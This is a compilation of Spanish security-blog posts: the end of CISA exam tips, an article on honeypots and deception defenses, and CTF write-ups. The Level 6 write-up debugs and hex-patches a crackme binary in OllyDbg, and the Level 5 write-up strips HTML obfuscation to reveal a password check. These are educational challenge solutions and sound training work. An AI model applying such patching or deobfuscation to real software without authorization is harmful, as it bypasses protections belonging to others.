horas de estudio y la asignación de tiempo por áreas temáticas es esencial para tener éxito cuando se realiza el examen CISA. Si eres un profesional en activo, la recomendación es planificar el examen de 3 a 4 meses antes. También hay quien sugiere más o menos que se dedique al menos una o dos horas de estudio regularmente. Además, le recomendamos que adapte su preparación y plan de estudios de acuerdo con su experiencia profesional y nivel de experiencia, de la siguiente manera: ### 8. División óptima del tiempo de preparación De acuerdo con los entrenadores de preparación para el examen CISA, se debe pasar el 35 - 45% del tiempo dedicado al manual, el 15 - 20% en entrenamiento, y otro 35 - 40% en exámenes de simulación y exámenes de práctica. ### 9. Adaptabilidad: Mantener una "Mente abierta" En el contexto del CISA, uno de los mejores consejos podría ser este: Desaprender lo aprendido es casi tan importante como aprender contenido nuevo. La industria TI es dinámica y siempre cambiante y, en consecuencia, también lo son sus principios y técnicas de auditoría. ### 10. Usa el documento de preguntas de CISA Al igual que con muchos exámenes competitivos, el éxito en el CISA es también una función de la forma en que se maneja la prueba de manera eficaz y eficiente: un tema común entre los aspirantes que no tienen éxito es la falta de tiempo para completar el examen, que resulta de una mala gestión de las preguntas. Al revisar los documentos de preguntas de años anteriores y las preguntas de pruebas simuladas, se debe diseñar un "plan de ataque" con estimaciones de la cantidad de tiempo que desea dedicar a la pregunta y al área temática. En esto, el CD de preguntas de ISACA, nos ayudará, pudiendo ir incrementando las preguntas, en tiempo, en temas .... (Recomiendo la obtención del CD como complemento de gran importancia al estudio, como veremos ) ### 11. Únete a los grupos y foros de CISA Los participantes pueden unirse a los grupos y foros de CISA para interactuar con otros aspirantes a CISA y con CISAs ya certificados. Estas plataformas pueden proporcionar conocimientos teóricos y prácticos sobre la auditoría de Sistemas de la Información, ayudando así a mejorar la comprensión de los conceptos del candidatos y su aplicación en el mundo real. ### 12. Explora los CDs de CISA y el material de aprendizaje electrónico Aunque una parte del programa de estudios de CISA requiere memorización, adquirir un grado de competencia y fluidez con la seguridad TI significa obtener una comprensión completa de las diversas áreas de la materia del examen. Presentado en un formato de guión gráfico fácil de asimilar, el material de capacitación de ISACA está disponible en CD en la tienda online de ISACA. ### 13. Cursos de formación de certificación CISA Muchas organizaciones acreditadas ofrecen cursos de capacitación de certificación CISA online o en persona. Tras ir al curso por mi parte, creo que es recomendable para gente con "poca" esperiencia, y sobre todo a nivel general, para aprender los conceptos claves de ISACA, como podria ser "Piensa en modo Americano" , o "Desconfia de las personas", ya que indica que damos vacaciones a los empleados, para así evitar fraudes. ### 14. Estudia tus habilidades de razonamiento verbal Para los candidatos que están preparandose el examen CISA en un idioma que no sea su lengua materna, puede ser un poco desalentador ( Mi recomendación, hazlo en tu idioma ). Las preguntas de elección múltiple abiertas y basadas en estudios de casos generalmente se presentan con elecciones subjetivas que requieren un razonamiento verbal para deducir las expectativas y llegar al conjunto de respuestas correcto. Se recomienda revisar el Glosario de términos CISA de ISACA para familiarizarse con los términos técnicos de seguridad de TI en inglés, así como con las siglas correspondientes al examen CISA. --- # Sistemas de decepción o cómo engañar a nuestro atacante URL: https://ciberseguridad.blog/sistemas-de-decepcion-o-como-enganar-a-nuestro-atacante/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-12-06 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > La mayoría de los datos se digitalizan y almacenan en los servidores de las organizaciones, lo que los convierte en un valioso objetivo. Las amenazas persistentes avanzadas [https://ciberseguridad.blog/indicadores-de-deteccion-apt-advanced-persistent-threat/] (APT), el espionaje corporativo y otras formas de ataques aumentan continuamente. Las compañías reportaron 142 millones de ataques fallidos en la primera mitad de 2013. Además, un informe de investigación de violación de datos (DBIR) de Ve La mayoría de los datos se digitalizan y almacenan en los servidores de las organizaciones, lo que los convierte en un valioso objetivo. Las amenazas persistentes avanzadas (APT), el espionaje corporativo y otras formas de ataques aumentan continuamente. Las compañías reportaron 142 millones de ataques fallidos en la primera mitad de 2013. Además, un informe de investigación de violación de datos (DBIR) de Verizon señala que los mecanismos de protección implementados actualmente no son adecuados para abordar las amenazas actuales. El informe indica que el 66% de las infracciones tardaron meses o años en descubrirse. Además, el 84% de estos ataques solo tomó unas horas o menos para infiltrarse en los sistemas informáticos. Indicando el mismo, que solo el 5% de estas infracciones se detectaron mediante los sistemas tradicionales de detección de intrusos (IDS), mientras que el 69% fueron detectadas por partes externas. Dentro de los sistemas informáticos, el software y los protocolos se han escrito durante décadas con la intención de proporcionar comentarios útiles a cada interacción. El diseño original de estos sistemas está estructurado para facilitar el proceso de detección y corrección de errores al informar al usuario la razón exacta por la que falló una interacción. Este comportamiento aumenta los esfuerzos de los malintencionados al proporcionarles información que les ayuda a comprender por qué su ataque no tuvo éxito, refinar sus ataques y herramientas y luego volver a atacar. Como resultado, estos sistemas son útiles para los atacantes y los guían a lo largo de su ataque. Mientras tanto, los sistemas dirigidos no aprenden nada acerca de estos intentos, aparte del pánico en el equipo de seguridad. De hecho, en muchos casos, los intentos múltiples que se originan en la misma entidad no se correlacionan con éxito. Las técnicas basadas en la decepción o el engaño (Deception Frameworks) proporcionan ventajas significativas sobre los controles de seguridad tradicionales. Actualmente, la mayoría de las herramientas de seguridad son medidas de respuesta a vulnerabilidades conocidas previamente. Los atacantes persistentes encuentran una vulnerabilidad que lleva a una infiltración exitosa al evadir la forma en que las herramientas detectan las sondas o al encontrar nuevas vulnerabilidades desconocidas. Esta postura de seguridad está parcialmente impulsada por el supuesto de que el "hacking-back" no es ético, mientras que hay una diferencia entre el acto de "atacar de nuevo" y el acto de engañar a los atacantes. Hay una diferencia fundamental en cómo funcionan los mecanismos basados ​​en deception / decepción en contraste con los controles de seguridad tradicionales. El último, usualmente se enfoca en las acciones de los atacantes, detectándolos o previniéndolos, mientras que el primero se enfoca en las percepciones de los atacantes, manipulándolos y, por lo tanto, induciendo a los adversarios a tomar acciones / inacciones de manera ventajosa para los sistemas específicos. Por ello, los framework o herramientas de decepción son "Acciones planeadas tomadas para confundir y / o confundir a los atacantes y, por lo tanto, hacer que tomen (o no tomen) acciones específicas que ayuden a las defensas de seguridad informática". [Vídeo](https://www.youtube.com/watch?v=6EyzCpEN5Q4) ## Herramientas basadas en HoneyPots Los Honeypots se han utilizado en múltiples aplicaciones de seguridad, como por ejemplo, detectar y parar spam, analizar el malware, proteger bases de datos, entornos móviles ... Los honeypots son de dos tipos diferentes: 1. Honeypot de servidor : El servidor honeypot es un sistema informático que no contiene información valiosa y está diseñado para parecer vulnerable por el objetivo de incitar a los atacantes a acceder a ellos. 2. Honeypot de cliente. Los honeypots del cliente son más activos. Se trata de agentes de usuario vulnerables que controlan muchos servidores para intentar comprometerse activamente. Cuando ocurren tales incidentes, los honeypots del cliente informan a los servidores que están infectando a los clientes de los usuarios. ### Áreas de uso de los honeypots 1. Detección Los honeypots proporcionan una ventaja adicional sobre los mecanismos de detección tradicionales, como los sistemas de detección de intrusos (IDS) y la detección de anomalías. Primero, generan menos datos de registro, ya que no están diseñados para ser utilizados como parte de las operaciones normales y, por lo tanto, cualquier interacción con ellos es ilícita. Segundo, la tasa de falsos positivos es baja, ya que nadie debe interactuar con ellos para las operaciones normales. Los honeypots también son útiles para detectar ataques y brotes en todo tipo de industria. 2. Prevención Los honeypots se utilizan en la prevención cuando ayudan a frenar a los atacantes y / o disuadirlos. Los Sticky honeypots son un ejemplo de máquinas que utilizan el espacio de direcciones IP no utilizado e interactúan con los atacantes que exploran la red para ralentizarlas . Más allá de la noción de atracción y trampas utilizadas en los honeypots, la decepción ha sido estudiado desde otras perspectivas. Por ejemplo, Rowe presenta una nueva forma de utilizar honeypots para la disuasión, protegiendo los sistemas haciéndolos parecer un honeypot y por lo tanto, disuadiendo a los atacantes de acceder a ellos. Su observación se derivó de los desarrollos de técnicas anti-honeypots que emplean métodos avanzados para detectar si el sistema actual es un honeypot. 3. Respuesta Una de las ventajas de usar honeypots es que son sistemas totalmente independientes que pueden desconectarse y analizarse después de un ataque exitoso contra ellos sin obstaculizar la funcionalidad de los sistemas de producción. Esto simplifica la tarea de los analistas forenses, ya que pueden preservar el estado atacado del sistema y analizar ampliamente lo que pasó. 4. Investigación Los honeypots se utilizan mucho para analizar e investigar nuevas familias de malware. El proyecto honeynet es una "organización internacional de investigación de seguridad sin fines de lucro, dedicada a investigar los últimos ataques y desarrollar herramientas de código abierto para mejorar la seguridad de Internet". Por ejemplo, el sistema HoneyComb utiliza honeypots para crear firmas de ataques únicas. Otras herramientas más específicas, como dionaea, están diseñadas para capturar una copia de malware de la computadora para un estudio adicional. Además, los honeypots ayudan a inferir y comprender algunos ataques generalizados, como la denegación de servicio distribuida (DDoS). ### Limitaciones del uso aislado de herramientas de decepción Las herramientas basadas en Honeypot usan técnicas valiosas para la detección, prevención y respuesta a los ataques de ciberseguridad. Sin embargo, esas técnicas adolecen de las siguientes limitaciones: Como indica el prefijo "honey", para que dichas técnicas sean útiles, el adversario debe interactuar con ellas. Los atacantes y el malware son cada vez mas sofisticados y su capacidad para evitar los honeypots está aumentando. 1. Si asumimos que logramos atraer al atacante a nuestro honeypot, debemos poder engañarlo continuamente para que se crea que se encuentra en un sistema real. Los programas polimorfos, no solo detectan honeypots, sino que también cambian su comportamiento para engañar al honeypot en sí. En esta situación, los atacantes están en una posición en la que tienen la capacidad de realizar actividades de lucha contra el engaño al comportarse de una manera diferente a cómo lo harían en un entorno real. 2. Para conocer los objetivos de los atacantes y atribuirlos, necesitamos que interactúen con los sistemas honeypot. Sin embargo, con un honeypot de alta interacción, existe el riesgo de que los atacantes puedan explotar el honeypot y usarlo como un punto de pivote para comprometer otras partes más sensibles de los sistemas internos de la organización. Por supuesto, con la separación correcta y las DMZ podremos aliviar el daño, pero muchas organizaciones consideran el riesgo intolerable y simplemente evitan el uso de tales herramientas. 3. Como los honeypots son totalmente "sistemas falsos", actualmente existen muchas herramientas para identificar si el sistema actual es un honeypot o no. Esta limitación fundamental es intrínseca en su diseño. ## Decepción como técnica de seguridad La buena ciberseguridad implica una colección de mecanismos que trabajen juntos para equilibrar el coste de asegurar nuestros sistemas con el posible daño causado por los compromisos de seguridad, y llevar la tasa de éxito de los atacantes al nivel más bajo posible. En la siguiente figura, se presenta una taxonomía de los mecanismos de protección comúnmente utilizados. El diagrama muestra cuatro categorías principales de mecanismos de protección e ilustra cómo se intersectan para lograr múltiples objetivos. La razón detrás de estas categorías de intersección es que una sola capa de seguridad no es adecuada para proteger a las organizaciones, por lo que se necesitan controles de seguridad de múltiples niveles. En este modelo, el primer objetivo es negar el acceso no autorizado y aislar nuestros sistemas de información de agentes no confiables. Sin embargo, si los adversarios logran penetrar en estos controles de seguridad, deberíamos tener mecanismos de degradación y ofuscación que desaceleren el movimiento lateral de los atacantes al penetrar en nuestros sistemas internos. Al mismo tiempo, esto hace que la extracción de información de los sistemas penetrados sea más desafiante. Incluso si reducimos la velocidad de los atacantes y ofuscamos nuestra información, los adversarios avanzados pueden explorar nuestros sistemas sin ser detectados. Esto motiva la necesidad de un tercer nivel de controles de seguridad que implique el uso de medios de decepción e información negativa. Estas técnicas están diseñadas para desviar a los atacantes y aumentar nuestros sistemas con señuelos para detectar adversarios furtivos. Además, esta información engañosa perderá el tiempo de los atacantes y / o aumentará el riesgo durante su infiltración. El grupo fi nal de mecanismos de la taxonomía está diseñado para atribuir a los atacantes y dar la capacidad de realizar operaciones de contraataque. Asegurar un sistema tiene un alto coste económica y las organizaciones tienen que encontrar el equilibrio adecuado entre coste y beneficio. Esta taxonomía proporciona una visión global de los controles de seguridad, con una comprensión de los objetivos de cada grupo y cómo pueden interactuar entre sí, ayudando a quienes toman las decisiones sobre qué controles de seguridad se deben implementar. [Imagen: Diagrama de Venn con las categorías de técnicas de decepción en ciberseguridad] A pesar de todos los esfuerzos realizados por las organizaciones, los atacantes pueden infiltrarse en los sistemas de información y operar sin ser detectados. Además, los adversarios persistentes pueden infiltrarse en el sistema y observar pasivamente durante un tiempo para evitar ser detectados cuando pasan a sus objetivos. Como resultado, se necesita una capa de defensa engañosa para aumentar nuestros sistemas con información negativa y engañosa para desviar a los atacantes. También podemos mejorar significativamente las capacidades de detección de intrusiones organizativas mediante la implementación de métodos de detección con múltiples facetas adicionales. Las técnicas de decepción son una parte integral de la naturaleza humana que se utiliza a nuestro alrededor todo el tiempo. Como ejemplo de un engaño ampliamente utilizado en los deportes: los equipos intentan engañar al otro equipo para que crean que están siguiendo un plan en particular para influir en su curso de acción. Usamos mentiras en las conversaciones para ocultar lapsos leves. En la ciberseguridad, los mecanismos basados ​​en señuelos y engaños se han usado en seguridad durante más de dos décadas en tecnologías como honeypots y honeytokens. Cuando los atacantes infiltran el sistema y superan con éxito los mecanismos tradicionales de detección y degradación, nos gustaría tener la capacidad no solo de ofuscar nuestros datos, sino también de desviar a los atacantes engañándolos y atrayendo su atención a otros datos que son falsos. Agotar al atacante y causar frustración es también un resultado defensivo exitoso. Esto se puede lograr plantando pistas falsas o usando esquemas como archivos sin fin. Estos archivos parecen pequeños en los servidores de la organización, pero cuando se descargan para ser exfiltrados agotarán el ancho de banda de los adversarios y activarán algunas alarmas. Con información engañosa cuidadosamente diseñada, incluso podemos causar daños en los servidores de los adversarios. Una técnica tradicional y exitosa de decepción puede aprenderse de la conocida historia de Farewell Dossier durante la guerra fría, donde la CIA proporcionó artículos modificados a un grupo de espías soviéticos. Cuando los soviéticos utilizaron estos diseños pensando que eran legítimos, se produjo un gran desastre que afectó a un oleoducto transiberiano. O una ejemplo brillante utilizado por una unidad secreta del ejército de la Segunda Guerra Mundial llamada The Ghost Army , como fueron estos tanques hinchables: [Imagen: Fotografía en blanco y negro de un tanque inflable señuelo sostenido por soldados] Cuando inyectamos información falsa causamos cierta confusión para los adversarios, incluso si ya han obtenido información sensible. La inyección de información negativa puede degradar o devaluar la información correcta obtenida por los adversarios. Los mecanismos basados ​​en decepción son una forma efectiva de atraer a los atacantes a exponerse a sí mismos y a sus objetivos cuando los detectamos accediendo a cosas o realizando actividades inusuales. Otras herramientas, como los IDS basados ​​en anomalías, tienen objetivos similares, pero la ventaja de las herramientas basadas en el engaño es que existe una línea clara entre las actividades normales del usuario y las actividades anormales. Esto se debe a que los usuarios legítimos claramente no deben acceder a esta información. Esta diferencia mejora significativamente la efectividad de los controles de seguridad basados ​​en el engaño y reduce el número de falsos positivos, así como el tamaño del archivo de registro del sistema. ### Ventajas del uso del engaño en las defensas informáticas Al utilizar inteligentemente técnicas engañosas, los defensores del sistema pueden confundir a los atacantes, mejorando así sus capacidades de defensa con el tiempo. Al explotar la confianza incuestionable de los atacantes en las respuestas del sistema informático, los defensores del sistema pueden obtener una ventaja y posicionarse un paso por delante de los intentos de compromiso. En general, las defensas de seguridad basadas en el engaño aportan las siguientes ventajas exclusivas a los sistemas informáticos. 1. Aumenta la entropía de la información filtrada sobre sistemas específicos durante los intentos de compromiso. Cuando un sistema informático está "enfocado", este, generalmente es solo protegerlo y defenderlo. Con el engaño, se pueden tomar medidas defensivas adicionales al alimentar a los atacantes con información falsa que, además de defender el sistema objetivo, hará que los intrusos cometan acciones erróneas o cometan errores y extraigan conclusiones incorrectas. Con la mayor propagación de los ataques APT y las amenazas de espionaje gubernamentales / corporativas, estas técnicas pueden ser efectivas. Cuando inyectamos información falsa causamos cierta confusión para los adversarios, incluso si ya han obtenido información sensible. La inyección de información negativa puede degradar y devaluar la información correcta obtenida por los adversarios. Heckman y su equipo desarrollaron una herramienta, conocida como "Blackjack", que copia dinámicamente un estado interno de un servidor de producción después de eliminar información confidencial e inyectar engaños, y luego dirige a los adversarios a esa instancia. 2. Aumenta la información obtenida en los intentos de compromiso. Muchos controles de seguridad están diseñados para crear un límite alrededor de los sistemas informáticos que detienen automáticamente cualquier intento de acceso ilícito. Esto se está volviendo cada vez más difícil a medida que estos límites se difuminan cada vez más, en parte como resultado de tendencias recientes como la "consumerización". Además, debido al bajo coste del lado de los adversarios y la existencia de muchas herramientas de explotación automatizadas, los atacantes pueden probar continuamente los sistemas informáticos hasta que descubren una vulnerabilidad. Durante este proceso, los defensores de los sistemas no aprenden nada sobre los objetivos de los intrusos. Irónicamente, esto hace que la tarea de defender un sistema informático sea más difícil después de cada ataque fallido. Conjeturamos que la incorporación de técnicas basadas en el engaño puede mejorar nuestra comprensión de los intentos de compromiso utilizando la actividad de sondeo ilícito como una oportunidad para mejorar nuestra comprensión de las amenazas y, por lo tanto, proteger mejor nuestros sistemas a lo largo del tiempo. 3. Dar a los defensores una ventaja en el bucle OODA. El bucle OODA (para Observar, Orientar, Decidir y Actuar) es un modelo de proceso cíclico, propuesto por John Boyd, mediante el cual una entidad reacciona ante un evento. La victoria en cualquier conflicto táctico requiere ejecutar este bucle de una manera que sea más rápida que la del oponente. El acto de defender un sistema informático contra ataques persistentes puede verse como una carrera de bucle OODA entre el atacante y el defensor. El ganador de este conflicto es la entidad que ejecuta este bucle más rápido. Una de las ventajas críticas de las defensas basadas en el engaño es que brindan a los defensores una ventaja en esa carrera, ya que alimentan activamente a los adversarios con información engañosa que afecta a su bucle OODA, más específicamente las etapas "observar" y "orientar" del bucle. Además, al desacelerar el proceso del adversario, los defensores tienen más tiempo para decidir y actuar. Esto es especialmente crucial en la situación de sorpresa, que es un tema común en los ataques digitales. 4. Aumenta el riesgo de atacar los sistemas informáticos desde el lado de los adversarios. Muchos controles de seguridad actuales se centran en prevenir las acciones asociadas con intentos ilícitos de acceder a los sistemas informáticos. Como resultado, los intrusos están utilizando esta retroalimentación negativa precisa como una indicación de que se han detectado sus intentos. Posteriormente, se retiran y utilizan otros métodos de infiltración más sigilosos. La incorporación de framework de decepción engaño en el diseño de los sistemas informáticos introduce una nueva posibilidad que los adversarios deben tener en cuenta. Es decir, que han sido detectados y actualmente engañados. Esta nueva posibilidad puede disuadir a los atacantes que no están dispuestos a correr el riesgo de ser engañados y analizados más a fondo. Además, la técnica le da a los defensores de los sistemas la capacidad de usar los intentos de infiltración de intrusos en su beneficio al proporcionarles información falsa de manera activa. ## Implementando e integrando herramientas de decepción Muchos mecanismos basados en decepción se implementan como un componente separado de los sistemas de producción reales, como los honeypot. Con el avance de muchas técnicas de detección utilizadas por los adversarios y el malware, los atacantes pueden detectar si se encuentran en un sistema real o en un sistema "falso", y luego cambiar el comportamiento en consecuencia. Una operación de decepción exitosa debe integrarse con la operación real. ## Evaluando el uso de decepción Identificar y monitorizar los canales de retroalimentación es crítico para el éxito de cualquier operación o componente de decepción. Hesketh discutió tres categorías generales de señales que pueden usarse para saber si un engaño fue exitoso o no: 1. El objetivo actúa en el momento y/o lugar equivocado. 2. El objetivo actúa de una manera que desperdicia sus recursos. 3. El objetivo retrasa la actuación o deja de actuar en absoluto. Los defensores deben monitorizar todos los canales de retroalimentación identificados. Usualmente hay tres resultados generales del uso de componentes de decepción. El adversario podría (1) creerlo, donde el defensor generalmente ve uno de los tres signos de decepción exitoso resaltado anteriormente, (2) sospecha o (3) no se lo cree. Cuando un atacante sospecha que se está utilizando un componente de engaño o decepción, debemos tomar la decisión de aumentar el nivel de engaño o detener el componente engañoso para evitar la exposición. A menudo, el engaño se puede mejorar presentando más información (y quizás verdadera) que hace que la historia del engaño sea más plausible. Esto se puede incluir como un bucle de retroalimentación dentro del framework de decepción. Esta observación debe ser analizada por el defensor para revisar su análisis de los sesgos del atacante y la metodología utilizada para crear el engaño . Además, el "engañador" podría emplear múltiples niveles de engaño en función de la interacción con el atacante durante el ataque. Cuando un atacante no cree en el engaño presentado, debemos tener una monitorización activa y un plan de acción detallado, teniendo muy en cuenta que algunos atacantes suelen actuar agresivamente cuando se dan cuenta de que han sido engañados. Esta puede ser una de las señales que se utilizan durante la etapa de monitorización para medir la reacción del componente engañoso por parte de los atacantes. Además, este comportamiento se puede usar como uno de los sesgos a ser explotados por otros mecanismos engañosos que pueden enfocarse en engañar al atacante acerca de la evaluación de daños del sistema --- # Capture The Flag - Reto Ciberseguridad Nivel 7 : Un Crackme mod by ... URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-7-un-crackme-mod-by/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-29 Actualizado: 2026-10-05 Tema: Capture The Flag o Reto de Ciberseguridad > Séptimo Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 7 al que hemos llamado "Un crackme by ...". ¡ ATREVETE ! Otro Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 7 al que hemos llamado "Un Crackme mod by ...". Podéis bajaros el ejecutable pinchando en la imagen: ## Resolución CTF - Nivel 7 : Un Crackme mod by ... El próximo Domingo día 9 de Diciembre, (perdonar) próximo Lunes día 10 de Diciembre, publicaremos la resolución de toda la serie de retos desde el Nivel 1 al Nivel 7. > Siempre hay un nuevo reto para mantenerse motivado. - Sean Connery --- # Capture The Flag - Reto Ciberseguridad Nivel 6 : El reactor URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-6-el-reactor/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-29 Actualizado: 2026-10-04 Tema: Capture The Flag o Reto de Ciberseguridad > Sexto Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 6 al que hemos llamado "El Reactor". ¡ ATREVETE ! Otro Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 6 al que hemos llamado "El reactor". Podéis bajaros el ejecutable pinchando en la imagen: ## Resolución CTF - Nivel 6 : El reactor > ¡Nunca dejes de desafiarte a ti mismo! ¡Nunca pierdas el entusiasmo! - Haider Ackermann. Si ejecutamos el binario vemos como tiene apariencia de un entorno scada. Aparece una luz verde intermitente y a simple vista ninguna caja, etiqueta, etc. que se pueda utilizar o modificar. Si abrimos un analizador de procesos como Process Explorer de Sysinternals, podemos ver como del programa original “Reactor.exe” cuelga otro llamado “Client1.exe”. [Imagen: Lista de procesos mostrando Reactor.exe y Client1.exe con su uso de CPU y memoria] [Imagen: Diagrama de flujo del proceso Reactor.exe creando y cargando Client1.exe desde una carpeta temporal] Podemos ver en las propiedades del mismo que escucha conexiones en un puerto, el 21337. [Imagen: Captura de las propiedades TCP/IP de Reactor.exe mostrando conexiones en el puerto 21337] Y que hay una conexión establecida. Esa conexión pertenece a “Client1.exe” que puede verse con el mismo programa. Podemos “atacharlo” al Ollydbg y ver qué ocurre. [Imagen: OllyDbg mostrando el hilo de Reactor.exe con la lista de módulos ejecutables y wsock32.dll resaltado] Ponemos una serie de Breakpoint en la dll “wsock32.dll” encargada de las conexiones con sockets y en funciones de lo que podríamos pensar se utilizan para recibir datos. Por ejemplo en “recv”. Puse en otros para asegurarme que no hacía nada más. [Imagen: Ventana de OllyDbg con las funciones exportadas por wsock32.dll como recv, send y sethostname] Y vemos como para en uno de ellos. [Imagen: Depurador OllyDbg mostrando la llamada a recv en Reactor.exe con búfer de 220 bytes] De momento no se ve nada, pulsamos F9 si queremos continuar hasta el siguiente Breakpoint o F8/F7 según convenga para ir paso a paso. Y ya vemos como comienza a verse los datos que el servidor recibe, en este caso: “status=OK,time=10”, unas cuantas veces. Eso es debido, lo adelanto, que mientras estás depurando, “Client1.exe” lo envía un OK cada 10 segundos y se acumulan. [Imagen: OllyDbg con el registro ESI mostrando la cadena capturada status=OK,time=10 repetida en memoria] Ya tenemos claro lo que recibe el servidor y lo que envía el cliente. Jugaremos primero con el servidor. Vamos a la parte de código (F8) en donde recibe el OK. [Imagen: Disassembler resaltando la cadena ASCII OK devuelta por la función WSARecv en Reactor.exe] Lo cambiamos por NO, por ejemplo. [Imagen: Ventana Edit data de OllyDbg cambiando el valor de memoria de OK a NO] Suspendemos el proceso “Client1.exe” ya que envía cada 10 segundos un OK y nos molestará a la hora de realizar esta modificación. [Imagen: Lista de procesos mostrando Reactor.exe, Client1.exe suspendido y OllyDbg analizando lacasitos.exe] Y pulsamos F9 quitando los breakpoints anteriores para que ya no pare. [Imagen: Interfaz del Crackme Reactor mostrando la alerta System Failure con el medidor de concentración en 50] ¡ERROR GENERADO! Y mirad como después del 10 aparece la palabra status. Por lo tanto, esto también es modificable, es una caja de texto, no visible fácilmente. Ahora le toca a la parte del cliente. [Imagen: OllyDbg mostrando el proceso Client1.exe en AppData Temp y la función send exportada de wsock32] Lo mismo para funciones de envío, por ejemplo “send”. Podríamos también buscar “status=” en la memoria para ver donde se llama: [Imagen: Volcado hexadecimal de Client1.exe con las cadenas status, time y Connected resaltadas en memoria] Podemos utilizar un simple editor hexadecimal para realizar algún cambio: Por ejemplo, OK por NO. [Imagen: Editor hexadecimal del ejecutable Client1.exe mostrando la cadena status=NO,time=10 antes de parchearla] Y generar el error de nuevo: [Imagen: Crackme Reactor con la alerta System Failure y el valor de estado ya legible como 10] O bien, podríamos cambiar el tiempo de envío, por ejemplo, cada 20 segundos. [Imagen: Editor hexadecimal mostrando la cadena parcheada status=OK,time=10 en el binario Client1.exe] Y ver como el error anterior desaparace ya que envía un OK, cada 20 segundos. [Imagen: Interfaz del Crackme Reactor funcionando sin errores con el tanque de producto lleno a 949 litros] Si ejecutáis el programa en una sandbox de análisis podríais ver rápidamente lo que hemos visto de los puertos: Processes: PID ParentPID User Path -------------------------------------------------- 1300 1556 KevinM C:\Users\KevinM\Desktop\Download\Reactor.exe 1948 1300 KevinM C:\Users\KevinM\AppData\Local\Temp\Client1.exe Ports: Port PID Type Path -------------------------------------------------- 21337 1300 TCP C:\Users\KevinM\Desktop\Download\Reactor.exe 49175 1948 TCP C:\Users\KevinM\AppData\Local\Temp\Client1.exe Y como es llamado, las API que utiliza: 514,e94,4051bb RegOpenKeyExA (HKCU\Software\Borland\Locales) 514,e94,4051d9 RegOpenKeyExA (HKLM\Software\Borland\Locales) 514,e94,4051f7 RegOpenKeyExA (HKCU\Software\Borland\Delphi\Locales) 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=0, sz=100000,type=2000, prot=1) = 160000 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=160000, sz=4000,type=1000, prot=4) = 160000 514,e94,6ce7b717 IsDebuggerPresent() = 0 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=0, sz=1000,type=1000, prot=40) = 3c0000 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=164000, sz=4000,type=1000, prot=4) = 164000 514,e94,4017ab VirtualFree(addr=164000, sz=4000, type=4000) (region_sz=4000) 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=168000, sz=4000,type=1000, prot=4) = 168000 514,e94,4017ab VirtualFree(addr=168000, sz=4000, type=4000) (region_sz=4000) 514,e94,77e35141 CloseHandle(h=d4) 514,e94,77e35147 CloseHandle(h=d0) 514,e94,456024 socket(family=2,type=1,proto=0) = ec 514,e94,455c72 bind(ec, port=21337) 514,e94,455ca6 listen(h=ec ) 514,e94,4083d4 Skipping DeleteFileA(C:\Users\KevinM\AppData\Local\Temp\Client1.exe) 514,e94,77e2caa4 CloseHandle(h=100) 514,e94,46b7ba WinExec(C:\Users\KevinM\AppData\Local\Temp\Client1.exe,1) 514,e94,77e37107 CloseHandle(h=110) 514,e94,77e2caa4 CloseHandle(h=110) 514,e94,77e2caa4 CloseHandle(h=114) 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=16c000, sz=4000,type=1000, prot=4) = 16c000 514,e94,dce7a17 VirtualAllocEx(h=ffffffff, addr=170000, sz=4000,type=1000, prot=4) = 170000 514,e94,4017ab VirtualFree(addr=170000, sz=4000, type=4000) (region_sz=4000) 514,e94,4017ab VirtualFree(addr=16c000, sz=4000, type=4000) (region_sz=4000) 514,e94,456c25 accept(ec,12fd88,12fda0) = 114 514,e94,455dd0 gethostbyaddr() Espero que os haya gustado. --- # Capture The Flag - Reto Ciberseguridad Nivel 5 : Boinas Negras Level 3 URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-5-boinas-negras-level-3/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-28 Actualizado: 2026-10-04 Tema: Capture The Flag o Reto de Ciberseguridad > Quinto Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 5 del Boinas Negras Level 3 ¡ ATRÉVETE ! Otro Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 5 el cual es el Level 3 de "Boinas Negras". Podéis bajaros el html de este CTH pinchando en la imagen: ## Resolución CTF - Nivel 5 : Boinas Negras Level 3 > No estás destinado a hacer lo que es fácil, estás destinado a desafiarte a ti mismo. - Justin Timberlake Este nivel 3 de Boinas Negras, sin duda, fue el más divertido. Nos encontramos con el siguiente código fuente: [Imagen: Código fuente HTML ofuscado por Atrise HTMLock con una cadena hexadecimal cifrada] Una página protegida con un software llamado Atrise HTMLock. En aquel momento era la primera vez que lo veía. Y como os podreis imaginar, no existía ni Google Chrome ni plugins mágicos que hicieran esto que vais a ver ahora mismo, cargamos la página en vuestro navegador favorito (en todos se puede hacer algo similar): [Imagen: Página del reto Boinas Negras pidiendo la contraseña para pasar al siguiente nivel] Os vais a la opción de “View Generated Source”: [Imagen: Menú del navegador desplegado en la opción View Source para ver el código fuente] Y ya tenéis la página “descifrada”: [Imagen: Código fuente con el aviso repetido de protección Atrise HTMLock y la cadena cifrada inicial] Por arte de magia, aparece una serie de funciones: [Imagen: Script JavaScript del reto Boinas Negras Nivel 3 con la función autenticar y validapass] Ahí es donde se realiza las comprobaciones sobre la contraseña introducida. [Imagen: Fragmento de código JavaScript calculando el array f[x] con la operación (y*y*y)%n] [Imagen: Función validapass en JavaScript revelando el código secreto 425581634525 que valida la contraseña] Pero, claro, estamos hablando de 2002. ¿Cómo lo saqué yo? Lo normal suele ser instalar el software para ver como funciona. [Imagen: Pantalla de bienvenida del programa Atrise HTMLock versión 2.2.1 para 